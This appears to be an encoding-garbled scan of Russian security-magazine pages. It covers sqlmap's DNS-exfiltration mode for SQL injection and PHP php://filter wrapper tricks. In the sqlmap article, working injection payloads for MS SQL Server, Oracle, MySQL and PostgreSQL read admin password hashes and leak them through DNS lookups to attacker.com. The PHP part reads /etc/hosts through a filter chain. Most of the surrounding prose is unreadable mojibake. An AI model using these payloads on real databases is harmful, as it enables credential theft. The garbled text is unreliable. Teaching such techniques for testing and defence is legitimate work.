Q*R*FC- LGJ,STLU VRV0L J($D793:1%9? D1< 837$A"9? 7$($D2'! D2"":5 '$($) DNS !) HM 8<);!>9@9 7(!19K$"!< 318K!4 "21!'!$ ; GLHM 79D7(9@(2>>, %949(:$ 7(<>9 !1! %93;$""9 !"!&!!(8N4 7(9&$33 ($)91;2 D9->$"":5 !>$", "27(!>$( D1< D9>$"2 attacker.com. WNB2< I8"%&!<, 7(!"!>2NE2< ; %2'$34;$ 72(2>$4(2 3$4$;9? 2D($3, 3%9($$ ;3$@9, 79D9?D$4 D1< 649? &$1!. G1$D8$4 94>$4!4=: "2> B$)(2)1!'"9, '49 D$12$4 642 I8"%&!< ! '49 9"2 ;9);(2E2$4 ; %2'$34;$ ($)81=4242, @12;"9$, '49B: 9"2 !"!&!21!)!(9;212 7(9&$33 ($)91;2 D9>$"":5 !>$". C "27(94!;, >: D91K": )2B94!4=3<, '49B: 42%!$ I8"%&!! B:1! ;:);2": %9(($%4"9 (B$) 3!"42%3!'$3%!5 9A!B9%) '$($) SQL-!"#$%&!N ! '49B: ; %2'$34;$ ;59D<E!5 72(2>$4(9; >: %2%!>-1!B9 9B(2)9> 7$($D21! ($)81=424 "2A$@9 SQL-79D)27(932 ("27(!->$(, 72(91= 2D>!"!34(249(2). T$9B59D!>9 $D!"34;$""9$ 8319;!$: 8 "23 D91K$" B:4= %9"4(91= "2D 9I!&!21=":> DNS-3$(;$(9> D1< D9>$"2, "2 %949(:? B8D84 947(2;1<4=3< )27(93:.

+,.,P DNS 0 PF,PMV- T$ B8D$> 8@18B1<4=3< ; 4$9(!N: < D8>2N, 4: 8K$ 7($%(23"9 79-"<1, ; '$> 93"9;"9? 7(!"&!7 242%!, ! 8K$ B$K!A= "234(2!;24= DNS "2 3;9$> D$D!%$. F($>$"! 649 )2?>$4 "$ 42% >"9@9. T9 D1<

-!(9312; S42>72( — 7(9I$33!9"21=":? (2)(2B94'!% 7(9@(2>>"9@9 9B$37$'$"!< ! !331$D9;24$1= ; 9B1234! !"I9(>2&!9""9? B$)9723-"934!. .9D!13< ; 1982 @9D8 ; @9(9D$ F8%9;2(, X9(;24!<; 7918'!1 34$7$"= >2@!34(2 %9>7=N4$(":5 "28% "2 I2%81=4$4$ 61$%4(94$5"!%! ! !"I9(>24!%! P2@($B3%9@9 8"!;$(3!4$42 ; 2005 @9D8. F "2349<E$$ ;($>< (2B942$4 "2D D9%49(3%9? D!33$(42&!$? "2 4$>8 B$)9723"934! ! 9(@2"!)2&!! 72(211$1="9? 9B(2B94%! D2"":5. G4($><3= )2"!>24=3< ;97(932>!, 3;<)2"":>! 3 B$)9723"934=N, 9" 3421 9D"!> !) 2;49(9; !);$34"9@9 94%(:49@9 7(9$%42 sqlmap (www.sqlmap.org), 793;<E$""9-@9 2;49>24!'$3%9>8 9B"2(8K$"!N ! 6%3718242&!! 8<);!>934$? 4!72 «F:791"$"!$ SQL-%9D2», ! 3 D$%2B(< 2009 @9D2 79349<""9 8'234;8$4 ; $@9 (2);!4!!. H19@ -!(9312;2 — bit.ly/KWCO0d.

-C.*GWVF SRV-JV. C SQLMAP

!"#$%

&'()* 09 /164/ 2012068

!"#$%"%& ' sqlmap ' ($))*+,-$. DNS $/*0& (+$'%$:

1. 1"(2'%3 sqmap )45 %*'%3+$6"035 0"43/35 307*-833:

~username$: python sqlmap.py -u \"http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1"

2. 9*(*+& 3'($4&:2. -4;/ --dns-domain, /%$#< 2-":"%& sqlmap, /%$ =< >$%3= 3'($4&:$6"%& (*+*)"/2 )"00<> /*+*: DNS-%+"?3-:

~username$: sudo python sqlmap.py -u \"http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" \--dns-domain="foobar.com" --passwords -v 3

@-+3(% ($A"B$6$ 3:64*/*% )"00<*, ($-":<6"5 6'; 0*$#>$)3=2; 30-?$+="83; $ -$43/*'%6* :"(+$'$6 3 ($42/*00<> ("-*%">. C0?$+="83; $ 0"'%+$.-* '$#'%6*00$B$ DNS– '*+6*+" 3D3 6 #$-$6<> 6<0$'">.

GET STARTED @ SQLMAPE",)<. 3: (+36*)*00<> (+3=*+$6 =$,*% #<%& (+$F-'(42"%3-

+$6"0 /*+*: '$$%6*%'%62;D2; 25:63=2; - SQL-307*-833 '%+"0382. G"(+3=*+, *'43 6 -"/*'%6* @HIJ 3'($4&:2*%'5 Oracle, " 25:63=$'%& (+3'2%'%62*% 6 GET-("+"=*%+* id, %$ (+3=*+0<. 6*-%$+ "%"-3 #2)*% 6<B45)*%& %"-:

http://www.target.com/vuln.php?id=(SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.attacker.com',80) FROM DUAL)--

9"-$. ,* ($)>$) (+3=*03= 3 - MySQL. K '42/"* Microsoft SQL Server 3 PostgreSQL 0*$#>$)3=$ 3'($4&:$6"%& -$=#303+$6"002; %*>03-2, %"- -"- $03 %+*#2;% )45 6<($40*035 6<+",*03*, '$-'%$5D** 3: 0*'-$4&-3> :"(+$'$6. 9"-3= $#+":$=, )45 Microsoft SQL Server :"(+$' #2)*% '4*)2;D3=:

http://www.target.com/vuln.php?id=1;DECLARE @host varchar(1024);SELECT @host=(SELECT TOP 1 master.dbo.fn_varbintohexstr(password_hash)FROM sys.sql_logins WHERE name='sa')+'.attacker.com';EXEC('master..xp_dirtree "\\'+@host+'\foobar$"');--

G*$#>$)3=$ 2($=502%& $)02 6",02; )*%"4& — )45 2'(*A0$. $+B"03:"833 DNS-%200*45 6 Microsoft SQL Server, PostgreSQL 3 MySQL F%3 @HIJ )$4,0< ($))*+,36"%& (2%3 6 ?$+="%* UNC, /%$, 6 $#D*=-%$, $:0"/"*%, /%$ %"-$. %200*4& =$,0$ '$:)"%&, *'43 0" '*+6*+* 6 -"/*'%6* #F-*0)" #2)*% 3'($4&:$6"%&'5 L@ Microsoft Windows.

L9 @MLK E JNMH L)0$. 3: '"=<> -4"''0<> +*"43:"83. F%$. %*>03-3 5645*%'5 6*43--$4*(0"5 %24:" sqlmap ' ($))*+,-$. 3'($4&:$6"035 DNS-:"(+$'$6 )45 (*+*)"/3 )"00<>, -$%$+2; =< 3 #2)*= 6$:&=*= 0" 6$$+2,*-03*. O%" ?3/" #<4" )$#"64*0" ' +*63:33 5086 6*%63 v1.0-dev 6 $?383"4&0$= GIT-+*($:3%$+33. @ ($=$D&; $(833 --dns-domain %< =$,*A& 6-4;/3%& ($))*+,-2 (*+*)"/3 )"00<> /*+*: DNS-%+"?3- 3 2-":"%& sqlmap, /%$ 6'* 6<($405*=<* :"(+$'< 0" +*:$46 3=*03 )$4,0< 2-":<6"%& 0" :")"00<. )$=*0 (0"(+3=*+, --dns-domain=attacker.com).

1"(3'& DNS-'*+6*+" (0"(+3=*+, ns1.attacker.com) )$4,0" '$)*+,"%& IP-")+*' ="A30<, 0" -$%$+$. #2)*% :"(2D*0 sqlmap.

0"/"4" )"6". +"''=$%+3= (+"-%3/*'-3* (+3=*+< (*+*)"/3 )"0-0<>, 0" (+3=*+* 2($=502%$B$ ("+$45 ")=303'%+"%$+", /*+*: =*->"03:= +*:$46" )$=*00<> 3=*0 )45 /*%<+*> +"'(+$'%+"0*00<> @HIJ. K (+3=*+"> #2)*% 3'($4&:$6"%&'5 )$=*0 attacker.com — )$=*00$* 3=5, 0") DNS -$%$+$B$ =< 3=**= ($40<. -$0%+$4&. P$40<. -$0%+$4& 6 )"00$= '42/"* 0*$#>$)3= )45 %$B$, /%$#< =< =$B43 ($42/3%& +*:24&%"%< 6<($40*035 SQL-($):"(+$'$6 3: 4$B$6 DNS-'*+63'":

Microsoft SQL ServerDECLARE @host varchar(1024);SELECT @host=(SELECT TOP 1 master.dbo.fn_varbintohexstr(password_hash) FROM sys.sql_logins WHERE name='sa')+'.attacker.com';EXEC('master..xp_dirtree "\\'+@host+'\foobar$"');

OracleSELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$WHERE name='SYS')||'.attacker.com',80) FROM DUAL;

MySQLSELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.attacker.com\\foobar'));

PostgreSQLDROP TABLE IF EXISTS table_output;CREATE TABLE table_output(content text);CREATE OR REPLACE FUNCTION temp_function()RETURNS VOID AS $$DECLARE exec_cmd TEXT;DECLARE query_result TEXT;BEGINSELECT INTO query_result (SELECT passwd FROM pg_shadow WHERE usename='postgres');exec_cmd := E'COPY table_output(content) FROM E\'\\\\\\\\'|| query_result||E'.attacker.com\\\\foobar.txt\'';EXECUTE exec_cmd;END;$$ LANGUAGE plpgsql SECURITY DEFINER;SELECT temp_function(); !"#$%&'( )*)+,# -+%#',* sqlmap --dns-domain

!"#$% 09 /164/ 2012 069

SQL-!"#$%&!! '$($) DNS

*+$ ,-..$(/!01$23$ sqlmap +,-+-43 0"$.($"!5 SQL-%-.1 436! ,(-7$+7!(-01"3 0 0!(78169"-2 -%(8/$"!! 0 +(10"$"!! + "-0-: 7$;"!%-:, !+,-69)8<=$: DNS. >36- !)2$($"- %-6!'$+70- -7,(10-6$""3; HTTP-)1,(-+-0 ! ,(-2$/87%! 0($2$"!, ,-7($4-010?!$+5 .65 7-@-, '7-43 +.12,!79 +-.$(/!2-$ 7146!'%! information_schema.COLLATIONS ()1"!21$7 -%-6- 4 A4, !)-)1 '$@- +%-(-+79 +-$.!"$"!5 ,-68'!61+9 .-+717-'"- 03+-%-:). * ,(!0$.$""-: "!/$ 7146!&$ ,(--7$+7!(-01""3$ 2$7-.3 ,-68'$"!5 .1""3; !) BC>D -7+-(7!(-01"3 + 8'$7-2 +%-(-+7! !; (14-73:

E$+-2"$""-, 0 ($169"3; 8+6-0!5; 2$7-., !+,-69)8<=!: DNS, ,-7($48$7 .-,-6"!7$69"-@- 0($2$"! 0 +05)! + 7$2, '7- 48.87 )1.$:-+70-01"3 DNS-+$(0$(3, (1+,-6-/$""3$ 0- 0"$?"$: +$7!. E$+2-7(5 "1 F7-, (1)"!&1 2$/.8 "!2 ! 2$7-.12!, -+"-01""32! "1 0($2$"! ! 6-@!'$+%!; 03(1/$"!5;, -+71"$7+5 0$+921 +8=$+70$""-:, 71% %1% ,-+6$."!$ ,-7($48<7 4-69?$ 0($2$"! !)-)1 4-69?$@- '!+61 03-,-6"5$23; )1,(-+-0.

GHBGIJCHK BALJLBGM JN>LGO DNS EXFILTRATION

* +0-< -'$($.9, sqlmap, (14-715 %1% ,-..$69"3: DNS-+$(0$(, ,($.-+71065$7 016!."3$ ("- P!%7!0"3$) -70$73 .65 0;-.5=!; DNS-)1,(-+-0 "1 ($)-60 !2$"!. Q!%7!0"3$ DNS--70$73 -7,(10-65<7+5 .65 (1)46-%!(-0%! -/!.1<=$@- 0$4-+$(0$(1, "$ )14-75+9 - ($)8697171;, %-7-(3$ -" 0$("$7, ,-+%-69%8 sqlmap 4$)(1)6!'"- +-.$(/!2-$ 0$4-+7(1"!&3.

D65 %1/.-@- F6$2$"71, %-7-(3: "8/"- +.12,!79, sqlmap -7-,(1065$7 +,$&!169"- +-).1""8< +7(-%8 SQL-)1,(-+1 0"87(! -43'"-@- HTTP-)1,(-+1, 1 0 P-"-0-2 ,-7-%$ -4(1417301$7 ! +-;(1"5$7 0+$ 0;-.5=!$ DNS-)1,(-+3. G1% %1% ($)869717 03,-6"$"!5 %1/.-@- SQL-)1,(-+1 )6-823?6$""!%1 -%(8/1$7+5 8"!%169"32! ! (1".-2"32! ,($P!%+-2 ! +8PP!%+-2, 7- "$7(8."- -,($.$6!79, %1%-: SQL-)1,(-+ +--70$7+708$7 ,(!?$.?$28 DNS-)1,(-+8. R(10.1, 71%-: ,-.;-. + «-4(126$"!$2» ($)869717-0 !+%6<'1$7 !+,-69)-01"!$ %$?!(8<=$@- 2$;1"!)21 DNS, )1+710655 !+,-69)-0179 ($%8(+!0"3: ($)-60 !2$".

A1/.3: DNS-)1,(-+ "1 ($)-60 !2$"! %-.!(8$7+5 0 ?$+7"1.&1-7$(!'"8< P-(28, '7-43 +--70$7+70-0179 +71".1(78 .65 .-2$""3; !2$" DNS (RFC 1034). G1%!2 -4(1)-2, 0+$ +,$&+!20-63 +-;(1"5<7+5. S$+7"1.&17$(!'"-$ ,($.+7106$"!$ .6!""3; SQL-)1,(-+-0 (1)-4!01$7+5 "1 '1+7!. T7- .$61$7+5 ,-7-28, '7- %1/.15 '1+79 .-2$""-@- !2$"! ("1,(!2$(, .example. !) tst1.example.com) -@(1"!'$"1 .6!"-: 0 63 +!20-61.

KHGLDO UNVIGO A1% 71%-03$, 2$7-.3 )1=!73 -7 171% 7!,1 SQL injection +0-.57+5 % "$+%-69%!2 ,(-+732 0$=12. B12-$ @610"-$ — "$-4;-.!2- ,!+179 4$)-,1+"3: %-.:• *"$ )10!+!2-+7! -7 5)3%1 ($16!)1&!! ,(!6-/$"!5, !+,-69)8:

.65 SQL-)1,(-+-0 71% "1)301$23: prepared statement, '7- .--+6-0"- ,$($0-.!7+5 %1% «,-.@-7-06$""3$ 03(1/$"!5». R-.(-4-"$$ - ,1(12$7(!)-01""3; )1,(-+1; 73 2-/$?9 ,-'!7179 ).$+9: bit.ly/zaNhPY.

• G!,!)!(8: 0+$ .1""3$, + %-7-(32! (14-71$?9. H+6! 73 7-'"- )"1$?9, '7- )"1'$"!$ ,$($2$""-: id — 0+$@.1 '!+6-, ,(!0-.! F78 ,$($2$""8< % 7!,8 int.

• Q!697(8: +,$&!169"3$ +!20-63.• J1)@(1"!'!01: .-+78, ,(10!69"-. T7- %1+1$7+5 ! ,-69)-017$65, +

,(1012! %-7-(-@- ,-7$"&!169"- 85)0!2-$ ,(!6-/$"!$ -+8=$+7-065$7 (14-78 + >D. E$ +7-!7 ,($.-+7106579 ,-69)-017$6< 6!?"!$ ,(!0!6$@!!, 0 7-2 '!+6$ ! !+,-69)-01"!$ ;(1"!23; 0 >D ,(--&$.8(, %-7-(3$ ,-7$"&!169"- 2-@87 ,-)0-6!79 )6-823?6$""!%8 ,(-!)0$+7! 171%8.

*KHBGL UNAWXYHEIZ *-7 73 ! ,-)"1%-2!6+5 + ,(-.0!"87-: 7$;"!%-:, !+,-69)8<=$: DNS ! )"1'!7$69"- ,-03?1<=$: +%-(-+79 ,-68'$"!5 .1""3; !) >D, %-7-(15 2-/$7 4379 !+,-69)-01"1, $+6! 4-6$$ 43+7(3$ 7$;-"!%! ,(!2$"!79 "$0-)2-/"-. J$)8697173 7$+7!(-01"!5 ,-%1)16!, '7- .1""15 7$;"!%1 "$ 7($48$7 -7,(10%! 4-69?-@- %-6!'$+701 )1,(-+-0, 1 F7- .$61$7 $$ 2$"$$ )12$7"-:. *-)2-/"-, !)-)1 7-@-, '7- -"1 7($48$7 "16!'!5 DNS-+$(0$(1, F71 7$;"!%1 "$ 48.$7 ,(!-2$"579+5 4-69?!"+70-2 171%8<=!;. B 7-'%! )($"!5 ($16!)1&!! 0+$ 03@65.!7 .-+717-'"- ,(-+7-, 71% '7- "$ +7-!7 "$.--&$"!0179 $$ ,(1%7!'$+%-: &$""-+7!. N ($16!)1&!5 ,-..$(/%! F7-@- 2$7-.1 0 71%-2 !"+7(82$"7$, %1% sqlmap, .-6/"1 +.$6179 $@- .-+78,"32 .65 0+$;. z

! "#$%& '%()*#+,- &.++/0 ,1 2.1/3%(,-*#4$5%

1.'6%4%5

76#8- (4#9)+&/)

1K$7-., -+"-01""3: "1 !+,-69)--01"!! -,$(17-(1 UNION (Union (full/partial))

3/136 0,70/2,50

2 K$7-., -+"-01""3: "1 030-.!23; BC>D -?!4%1; (Error-based) 777 9,02

3K$7-., !+,-69)8<=!: DNS-7(1P!% .65 ,$($.1'! .1""3; !) 41)3 (DNS exfiltration)

1409 35,31

4 K$7-., -+"-01""3: "1 6-@!'$+%!; 03(1/$"!5; (Boolean-based blind) 29 212 214,04

5K$7-., -+"-01""3: "1 0($2$"! -70$-71 BC>D (Time-based), )1.$(/%1 — 1 +$%8".1

32 716 17 720,51

WWW

• :%(## '%&6%2+); ,+<%68.=,; % 9(.44,<,9.=,, , %4%2#++%4$-0 6.1(,*+/0 $,'%5 SQL-,+>#9=,? $/ 48%@#AB +.?$, +. +.A#8 4.?$# '% .&6#4): bit.ly/P12zz9.

• C%&6%2+## % $%8, 9.9 '%&+-$B 45%? DNS-4#65#6 4 ,4'%(B1%5.+,#8 bind9, $/ 8%@#AB '6%*,$.$B 5 D$%? 4$.$B#: bit.ly/MIEAE2.

INFO

C%8+,, *$% sqlmap 59(;*.#$ '%&&#6@9) '#6#&.*, 6#1)(B$.$%5 ,1 MS SQL, MySQL, PostgreSQL , Oracle *#6#1 DNS $%(B9% 5 4()*.#, 9%E&. &%4$)'+/ 8#&(#++/# 8#$%&/ «5/$-E,5.+,-» ,+<%68.=,,, , %'=,- --dns-domain &%(@+. 2/$B -5+% 1.&.+. '%(B1%5.$#(#8.

7/4$)'(#+,# ",6%4(.5. F$.8'.6. +. PHDays 5 "%495#

!"#$% !"#$%#& '(%$)*+, Positive Technologies (amoskvin@ptsecurity.ru)

&'()* 09 /164/ 2012070

!"#$% 2 (2)

!"# $# %#&'() *#$+ ,$-./# /001#*-'23#1/ 1-,243 .-1-'5 $2* -0-6#$$-037,/ &#21/829// 78(:2 PHP / 1-./:/ &26-3( #.- ;5$:9/), / 7 ' 3-, </01#. =6>#:3-, ,-#.- $#*2'$#.- /001#*-'2$/7 0321/ '&2%%#&( ?3-.- <5*#0$-.- 78(:2. @2: / -6#A21, '(*24 0'#"54 %-&9/4 0-day-$2&26-3-:, -0$-'2$$(B $2 /0%-1+8-'2$// '&2%%#&2 php://filter, :-3-&(# %&#*032'1743 0-6-) $-'(# 3#B$/:/ ?:0%152329// 578'/,-03#) ' '#6-%&/1-"#$/7B.

+,-./012 -345061,!"! #$%&'() php://filter&#'()%*(+",&- +."''-."PHP://FILTER + /(,$-/#$- "$"/& ," +-0-'.&)(1-,&2

INTRO C#.-*$7 ,( %&-*-1"2#, 3#,5 /001#*-'2$/7 '&2%%#&-' 78(:2 PHP 0 3-<:/ 8&#$/7 232:/ $2 '#6-%&/1-"#$/7 (%#&'54 <203+ 3( ,-"#D+ $2)3/ ' %&-D1-, $-,#&# /1/ ' PDF $2 */0:#). E2%-,$4, '&2%%#&( — ?3- 2603&2:3$() 01-) *17 &26-3( 0 ;2)12,/, 0#3+4, 0"23(,/ *2$$(,/ / *&5./,/ &#05&02,/. F3- &#05&0, /8 :-3-&-.- ,-"$- </323+, ' :-3-&() ,-"$- %/023+ / '$53&/ :-3-&-.- ,-"$- %#&#,#A23+07. G %&#*(*5A#) 0323+#, -%561/:-'2$$-) ' 2'.5-03-'0:-, $-,#&# («H*-'/327 -6#&3:2»), ,( &200,-3&#1/ '-8,-"-$-03/ /0%-1+8-'2$/7 '&2%%#&-' *17 &26-3( 0 2&B/'2,/, 2 32:"# '&2%%#&2 data. G %&-D1() &28 ,( /0%-1+8-'21/ '&2%%#&( *17 ?:0%152329// 578'/,-03/ ' TimThumb v1.x, 0#.-*$7 "# ,( %&-*-1-"/, &#0#&< C3#;2$2 F00#&2 -3$-0/3#1+$- 0/03#,( '#6-2$21/3/:/ Piwik, 5.156/,07 ' ?:0%152329/4 578'/,-03#) ' phpMyAdmin / phpList. I '0# ?3- '-8,-"$- 0 /0%-1+8-'2$/#, '&2%%#&2 php://filter. J-3-'? K-#B21/!

WARNING

,%- *+.(/012*- 3/#4(%51)"#+1 *%$"67*5#"8+( ) (9+1$(0*5#"8+:; 2#"-;. <* /#41$2*-, +* 1)5(/ +# +#%=5 (5)#5%5)#++(%5* 91 "6>(& )(90(?+:& )/#4, 3/*7*+#++:& 015#/*1"10* 41++(& %5158*.

!"#$%&'( #)*+&,', %-% #.'/012 php://filter

!"#$% 09 /164/ 2012 071

!"#$%#& "'()*+ ,-$.%## base64_decode

!"#$%#& "'()*+ ,-$.%## base64_encode

3456789: PHP ;8<=456>? =+'..*+ php://filter — @&# $%" A*&'#)*+&,%, .#B$#-(CD%2 .+%A*0(&E F%-E&+1 , .#&#,G $# $+*A( #&,+1&%(. 4/.#-EB#$'0%* F%-E&+#$ "'*& $#BA#H0#/&E &+'0/F#+A%+#$'&E "'001*, .#-GI'*A1* %B F'2-' %-% B'.%/1$'*A1* $ F'2-. = PHP */&E $/&+#*001* F%-E&+1, "#/&G.01* .# GA#-I'0%C, 0# / .#A#DEC $+'..*+' php://filter &',H* A#H0# B'"*2-/&$#$'&E % .#-EB#$'&*-E/,%* F%-E&+1, /#B"'001* / .#A#DEC FG0,-J%% stream_filter_register. ;+% @&#A %/.#-EB#$'0%* 0*#.+*"*-*001K F%-E&+#$ 0* $-%(*& 0' #)+')#&,G "'001K "+GL%A% F%-E&+'A%. >'.+%-A*+, */-% F%-E&+ anyfilter 0* #.+*"*-*0, &# FG0,J%( readfile .+#/&# $1$*"*& /#"*+H%A#* /etc/hosts .#-0#/&EC $ $*+K0*A +*L%/&+*.

readfi le("php://fi lter/read=string.toupper|\ anyfi lter/resource=/etc/hosts" );

M&' #/#)*00#/&E A#H*& )1&E .#-*B0' "-( #)K#"' .+#$*+#,, 0' #/0#$* strpos, preg_match % "+GL%K.

/0123453 678!!398:=/&+#*001* F%-E&+1 convert.base64-decode % string.strip_tags .#-B$#-(C& G"'-(&E I'/&E "'001K %B .#&#,'. = 2009 L#"G N&*F'0 M//*+ %/.#-EB#$'- @&G #/#)*00#/&E F%-E&+' convert.base64-decode $ @,/-.-#2&* "-( Piwik (bit.ly/4tSIKo). = /$#*A '"$%B#+% N&*F'0 M//*+ G,'-B1$'- 0' &#& F',&, I&# / .#A#DEC php://filter A1 A#H*A /#B"'$'&E F'2-1 / .+#%B$#-E01A /#"*+H%A1A, %A*( &#-E,# $#BA#H0#/&E $0*"+(&E /$#% "'001* $ ,#0*J F'2-'.

># / 2009 L#"' #/&'-%/E 0* +'/,+1&1 "$' $'H01K $#.+#/': ,',%A #)+'B#A A#H0# G0%I&#H'&E «0*0GH01*» "'001* % ,',%* $#BA#H0#/&% "'*& .+%A*0*0%* F%-E&+#$?

O&#)1 +'B#)+'&E/( / @&%A, 0*#)K#"%A# )#-** "*&'-E0# %BGI%&E +')#&G FG0,J%2 base64_encode/base64_decode.

8!561453 12;8957<1 BASE64<-L#+%&A Base64 #.%/'0 $ .'+'L+'F* 6.8 RFC 2045, %"*( '-L#+%&A' — #)+'&%A#* ,#"%+#$'0%*, ,#&#+#* .*+*$#"%& /&+#,%, /#/&#(D%* %B /%A$#-#$ $#/EA%)%&0#2 ,#"#$#2 &')-%J1, $ /&+#,%, /#/&#(D%* %B &',%K /%A$#-#$:

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/

= "'-E0*2P*A 0')#+ @&%K /%A$#-#$ )G"*A 0'B1$'&E '-F'$%&#A Base64 %-% .+#/&# '-F'$%&#A. ;#-EB' #& &',#L# .+*#)+'B#$'0%(

B',-CI'*&/( $ &#A, I&# "'001* /#K+'0(C&/( .+% .*+*"'I* $ -C)1K /*&(K % A*H"G -C)1A% G/&+#2/&$'A% ($0* B'$%/%A#/&% #& ,#"%+#$-,%). = #/0#$* '-L#+%&A' -*H%& /$*"*0%* &+*K $#/EA*+#, )%&#$ (24) , I*&1+*A P*/&*+,'A (&#H* 24) % .+*"/&'$-*0%* @&%K P*/&*+#, $ $%"* /%A$#-#$ '-F'$%&' Base64. 7# */&E $K#"(D'( /&+#,' +'B)%-$'*&/( 0' I'/&% .# &+% /%A$#-' (*/-% $ .#/-*"0CC I'/&E .#.'"'*& &#-E,# #"%0 %-% "$' /%A$#-', &# #/&'$P%*/( )%&1 B'.#-0(C&/( 0G--(A%) % ,'H"'( I'/&E .+*#)+'BG*&/( $ /&+#,G %B I*&1+*K /%A$#-#$ '-F'$%&'. >'.+%A*+, */-% A1 K#&%A B',#"%+#$'&E Base64 /&+#,G avw, /0'I'-' .#-GI%A /&+#,G, /#/&#(DGC %B )'2&#$, /##&$*&/&$GC-D%K @&%A /%A$#-'A. M&# A#H0# /"*-'&E, 0'.+%A*+, &',:

$s='avw';$l=strlen($s);$bin_s='';for($i=0; $i<$l; $i++){ $bin_c=decbin(ord($s[$i])); $r=8-strlen($bin_c); if ($r != 0) $bin_c=str_repeat("0", $r).$bin_c; $bin_s.=$bin_c;}

Q'-** +'B#)E*A @&G /&+#,G 0' .#"/&+#,% %B P*/&% /%A$#-#$ % .#-GI%$P%A/( "$#%I01A I%/-'A /#.#/&'$%A /%A$#-1 %B '-F'$%&'.

$bin_len=strlen($bin_s);$base64_c="ABCDEFGHIJKLMNOPQRSTUVWXYZabcd\ efghijklmnopqrstuvwxyz0123456789+/";for($i=0; $i<$bin_len; $i=$i+6){ $bsc=substr($bin_s, $i, 6); $j=bindec($bsc); $base64_s.=$base64_c[$j];}

= %&#L* A1 .#-GI%A &# H* /'A#*, I&# % .+% #)1I0#A .+%A*0*0%% base64_encode , /&+#,* avw. 7*.*+E +'//A#&+%A +')#&G FG0,J%% base64_decode. R', 0*/-#H0# "#L'"'&E/(, .+% .+#J*//* "*,#"%-+#$'0%( $# $K#"(D*2 /&+#,* )G"G& GI%&1$'&E/( &#-E,# /%A$#-1 '-F'$%&', ' $/* #/&'-E01* %L0#+%+#$'&E/(. ;+% @&#A $K#"(D'( /&+#,' )G"*& +'B)%$'&E/( 0' I'/&% .# I*&1+* /%A$#-' % %B 0%K )G-"*& "*-'&E/( &+% /%A$#-' $#/EA%)%&0#2 ,#"#$#2 &')-%J1. ;#@&#AG .+%A*0*0%* base64_decode , /&+#,* 0*/,#-E,# +'B )G"*& GA*0E-P'&E "-%0G /&+#,%, % 0' ,',#A-&# P'L* A1 .#-GI%A .G/&GC /&+#,G. >' @&#A 0*/-#H0#A B'A*I'0%%, .# /G&%, % #/0#$1$'*&/( .+%*A M//*+' / $1"'$-%$'0%*A /&#..*+'. ># ,',GC /&+#,G "#)'$-(&E $ ,#0*J F'2-', I&#)1 $ +*BG-E&'&* .#-GI%-/( F'2- / .+#%B$#-E01A /#"*+H%A1A? 7', ,', $K#"(D'( /&+#,' +'B)%$'*&/( 0' I'/&% .# I*&1+* /%A$#-' '-F'$%&' % ,'H"'( I'/&E "*,#"%&/( #&"*-E0#, &# "-( &#L#, I&#)1 "*,#"%+#$'0%* /&#..*+' 0* $-%(-# 0' "*,#"%+#$'-

!"#$%

&'()* 09 /164/ 2012072

for ($i = 1; $i <= 5 ; $i++) { print $i."\n"; $S=base64_decode($S); print $S."\n";}

!"# $%&' $()*+,' +,--(. /&0*+ 1-#20*3&-#4 %0*55&"*$ -& /*3&0 6(07 1-#$&"%,87-(/. 9 2009 )*+1 6(8* :,/&2&-*, 20* ;1-<=#4 base64_decode -&<*""&<0-* *6",6,0($,&0 %0"*<#, %*+&"3,>#& $ %&"&+#-& :-,<# ",$&-%0$, [#47174] (bit.ly/Ny6BxX). ?0*0 6,) 6(8 +*-$*87-* *5&",0#$-* #%5",$8&- +84 ;1-<=## base64_decode, -* +84 ;#870", convert.base64-decode -#<,<#' #%5",$8&-#. %+&8,-* -& 6(8*. !*@0*/1, &%8# 5"# «$(+,$8#$,-##» -, <,<*/-0* A,)& 5*812,-B0%4 +,--(&, %*+&"3,>#& :-,< ",$&-%0$,, +,87-&.A&& 5"#/&-&-#& ;#870", convert.base64-decode 1-#20*3#0 5"&*6",:1&/1B %0"*<1.

$s = "php://fi lter/read=convert.base64-decode/ resource=data:,dGVzdA==CRAP"; var_dump(fi le_get_contents($s)); // print: string(0) ""

C* -& 0*87<* ;#870" convert.base64-decode /*3&0 1+,8407 +,--(& #: 5*0*<,, 6*8&& @;;&<0#$&- $ @0*/ 58,-& ;#870" string.strip_tags.

!"!#$%%!"&' (')*&+, STRING.STRIP_TAGSD#870" string.strip_tags 5*4$#8%4 $ PHP $ $&"%## 5.0.0, #%5*87:*-$,-#& @0*)* ;#870", @<$#$,8&-0-* *6",6*0<& $%&' +,--(' 5*0*<, ;1-<=#&. strip_tags(). D#870" /*3&0 5"#-#/,07 ,")1/&-0( $ *+-*. #: +$1' ;*"/: 8#6* $ $#+& %0"*<# %* %5#%<*/ 0&)*$, <,< # $0*"*. ,")1/&-0 ;1-<=## strip_tags(), 8#6* /,%%#$ -,:$,-#. 0&)*$. C,-5"#/&", 20*6( 1+,8#07 #: %0"*<# $%& 0&)#, <"*/& <b><i><u>, /*3-* #%5*87:*$,07 ;#870" string.strip_tags 0,<#/ *6",:*/:

$fp = fopen('php://output', 'w');stream_fi lter_append($fp, 'string.strip_tags', \ STREAM_FILTER_WRITE, array('b','i','u'));fwrite($fp, "<b>bolded text</b> enlarged to \ a <h1>level 1 heading</h1>\n");fclose($fp);

!"#/&-&-#& ;#870", string.strip_tags 1+,84&0 -& 0*87<* HTML-0&)#, 0,<3& 61+10 1+,8&-( PHP-0&)# # HTML-<*//&-0,"##.

HTML Tag: <abc>PHP Tag:<? ?>HTML Comments:<!-- -->

